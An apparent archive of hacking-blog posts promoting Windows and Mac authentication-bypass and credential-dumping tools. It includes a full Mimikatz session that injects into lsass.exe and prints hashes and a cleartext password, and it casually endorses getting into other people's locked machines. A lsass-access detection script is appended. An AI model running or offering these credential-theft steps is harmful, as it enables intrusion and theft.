illmob.org

Kon-Boot 2.5 released with Windows 10 support

October 12th, 2015 by admin in Apple, Privilege Escalation, windows


Kon-Boot is an application which bypasses the authentication process of Windows and Mac based operating systems. This version works with both 64-bit and 32-bit Microsoft Windows up to version 10 and with Mac OS X Mavericks. It boots from a CD, floppy, or USB drive and also supports UEFI-based systems.

It also includes a special feature which gives you a command prompt with SYSTEM-level privileges at the login screen. It is easy to use and excellent for tech repairs, data recovery and security audits. They offer personal and professional licences, and it is well worth the cost. Buy your copy today!

Offline NT Password & Registry Editor

March 25th, 2014 by admin in cracking, Privilege Escalation, windows

Offline NT Password & Registry Editor finally got an update last month after a four-year hiatus. The new version of this awesome bootdisk includes support for Windows 8.1 and a working ‘promote user to admin’ feature, among other fixes and driver updates.

The two new command-line tools are:
samusrgrp: a command-line tool to add users to groups or remove users from groups. Users and groups must be local (not domain / AD). It can also list the groups with their members in several forms, and the output can of course be used in scripts. Listing groups will also list domain users that are members of the group (if any), but it will not be able to look up the name, so such a member is listed as a SID only.

sampasswd: resets passwords from the command line (scriptable), or lists the users in the SAM file in a few different formats.

More information on these new tools ::here::
The bootdisk can be run from a floppy, CD, or USB drive and can be downloaded from http://pogostick.net/~pnh/ntpasswd/

Kon-Boot v2.3 released

November 19th, 2013 by admin in Apple, Privilege Escalation, windows

The best password bypass program out there has been updated, with a few bug fixes and support for Windows 8.1. A must-have for any computer technician. I use the product almost daily at my shop. Whenever a customer drops off a Windows computer and doesn’t know their wife’s/kid’s/gf’s password, or I’m doing on-site work and Mary the secretary is on her lunch break and I need to update her locked computer, this is my go-to program. It’s better than a password reset, because a reset also destroys the other saved passwords for Internet Explorer, Google products, etc. that all use the CryptProtectData function along with your logon password to encrypt data.

Watch the video to see how easy it is to use.

And best of all is the price: $15 for a personal license and $75 for a commercial license. The time it saves is definitely worth it 10x over.
More information can be found ::HERE::

P.S. They also have an Apple Mac version.

Capturing Windows Logon Credentials

November 3rd, 2013 by admin in cracking, Privilege Escalation, windows


Microsoft GINA technology, which stands for Graphical Identification and Authentication, is responsible for graphically handling logon requests when events such as CTRL-ALT-DEL are received. Tyler Wrightson finally released his modified GINA stub that silently logs usernames and domains on XP and Win2k. You can download it ::here::. More information about how GINA works can be found in his excellent blog post.

This will not work on Vista and later operating systems, as they switched to the Credential Provider model. Microsoft claims the reasoning behind this is to make it easier for developers to meet the demands of next-generation authentication technologies (such as biometrics, two-factor and single sign-on). Have no fear, he also released a version for Vista/7 ::here::. More information can be found in his blog post.

Kon-Boot 2.1 is out

September 3rd, 2012 by admin in Apple, Privilege Escalation, windows

What’s new in version V2.1?
– Windows 8 support (only standard BIOS, no EFI support)
– Sticky keys feature (allows user to spawn a console window with system admin rights before the user is logged in)

src: http://www.thelead82.com/kon-boot/

CMOS De-Animator

July 2nd, 2012 by admin in BIOS, Privilege Escalation, windows

If you can’t enter the BIOS because it is password-protected, but you can still boot into Windows, you can try CMOS De-Animator to clear the BIOS settings. It works on both 32- and 64-bit Windows. If that doesn’t work, try our BIOS password recovery service. CMOS De-Animator can be downloaded from the author’s website ::HERE::

MimiKatz – clear text passwords

March 29th, 2012 by admin in Password Info, windows

As you’ve seen in our previous post about WCE, Windows keeps your password around for wdigest authentication. Your system needs cleartext passwords for Single Sign-On with Terminal Server (the tspkg provider) and for its Windows Digest implementation (the wdigest provider). The passwords are not held in cleartext in memory, but because they must be available in plaintext for SSO, they are encrypted in a reversible way. wdigest needs the password itself in order to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password, not just its hash. Mimikatz is a tool that recovers these plaintext passwords, saving the time and computing power needed to brute-force a 16-character NTLM password during pen-testing or tech work. It injects a DLL into lsass.exe to recover the information. The blog and program are in French: http://blog.gentilkiwi.com/mimikatz

Below is a demonstration of how to use mimikatz; the commands typed by the user are the ones following the "C:\...>" and "mimikatz #" prompts (shown in red in the original post).
(The privilege::debug command is not required if you are already running as SYSTEM.)

C:\Mimikatz\x64>mimikatz
mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification  : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification  : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
                        ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/
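The session above works by injecting a DLL into lsass.exe, which means opening that process with write and thread-creation rights. As an added example that is not part of the original post, the Python below scans Sysmon Event ID 10 (ProcessAccess) records for exactly that pattern, using constructed sample events; the allow-list of source images is an assumption to be tuned per environment.

```python
# Added example, not from the original post: flag Sysmon Event ID 10
# (ProcessAccess) records where a non-allow-listed image opens lsass.exe
# with the rights DLL injection needs (as the session above does).

# Process access rights, from winnt.h.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Writing a DLL path into lsass and starting a thread to load it needs all three.
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Images that legitimately open lsass; assumption, tune for your own estate.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\svchost.exe",
}

def classify(event):
    """Return 'inject', 'read' or None for one Sysmon ID 10 record (a dict)."""
    if event.get("EventID") != 10:
        return None
    if not event["TargetImage"].lower().endswith(r"\lsass.exe"):
        return None
    if event["SourceImage"].lower() in ALLOWED_SOURCES:
        return None
    granted = int(event["GrantedAccess"], 16)
    if (granted & INJECT_RIGHTS) == INJECT_RIGHTS:
        return "inject"
    if granted & PROCESS_VM_READ:   # read-only scraping of lsass memory
        return "read"
    return None

def scan(events):
    """Return (source image, verdict) for every suspicious record."""
    return [(e["SourceImage"], v) for e in events if (v := classify(e))]

# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Mimikatz\x64\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\dumper.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Users\bob\dumper.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1FFFFF"},
]
```

Calling scan(SAMPLE_EVENTS) flags the mimikatz record as "inject" and the read-only dumper record as "read", while the allow-listed svchost access and the notepad access are ignored.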

Windows Credentials Editor (WCE) 1.3 x64 released

March 14th, 2012 by admin in cracking, Password Info, Privilege Escalation, windows

Windows Credentials Editor (WCE) allows you to list logon sessions and to add, change, list and delete their associated credentials (e.g. LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, to obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, and to obtain Kerberos tickets and reuse them on other Windows or Unix systems. It also dumps passwords in plaintext without the need to crack the hashes. It supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) – WCE v1.3beta (64-bit) (download)

A Frequently Asked Questions (FAQ) page is available here.

The new threat

February 12th, 2011 by admin in Apple, cracking, Linux, Privilege Escalation, Uncategorized, windows

Programmable embedded devices can present themselves as a HID device, just like a keyboard or mouse. So with physical access and a minute alone, a system can be compromised with something the size of your thumb. The possibilities are endless: HTTP/FTP downloads, injecting binaries via debug or PowerShell, etc. The device is also cross-platform, which means Windows, Linux, UNIX and Apple systems are all vulnerable.

Here’s an example project we made for a Windows 7 box that adds a new Admin user to the system and hides that user from the logon screen. The whole process takes about 16 seconds, with most of the time taken by the device being detected as a keyboard and its driver being installed. The device costs about $20 and can be found here.

BitLocker password cracker

September 29th, 2010 by admin in cracking, windows

Passware Inc. says it has come up with a way to access files on USB drives secured by the BitLocker encryption feature of Microsoft Windows.

They announced this week the release of Passware Kit Forensic version 10.1. The vendor said its software now lets investigators recover BitLocker encryption keys and get “full access” to the contents of encrypted disks.

Microsoft added its BitLocker hard-disk encryption feature to the “ultimate” and “enterprise” versions of its Windows Vista and Windows 7 operating systems, in response to greater concern over data losses and breaches. It is also present in Windows Server 2008 and Windows Server 2008 R2.

Passware’s target market is law enforcement, said the company’s marketing manager, Nataly Koukoushkina.

She added that users need physical access to computers in order to use Passware to defeat BitLocker encryption.

“That’s not easy for hackers,” she said. “We developed it for investigative purposes only.”

Passware launched the tool at a training conference held by the High Technology Crime Investigation Association (HTCIA) in Atlanta.

The software costs US$795 and includes a year of free updates, Koukoushkina said, adding the BitLocker feature of Windows stores the encryption keys in a computer’s memory.

“We are using this vulnerability in order to decrypt the BitLocker hard disk,” she said. “Now the enhancement is for portable disk USB drives.”

Passware, which says its customers include the U.S. Department of Defense, makes software designed to either recover or reset passwords for a variety of document types, including Adobe Acrobat, plus Microsoft Word, Excel and Access.

The enterprise version will scan machines for password-protected files and scan a physical memory image file for disks encrypted with either BitLocker or TrueCrypt. If a TrueCrypt volume is dismounted, the Passware software falls back to a brute-force attack.
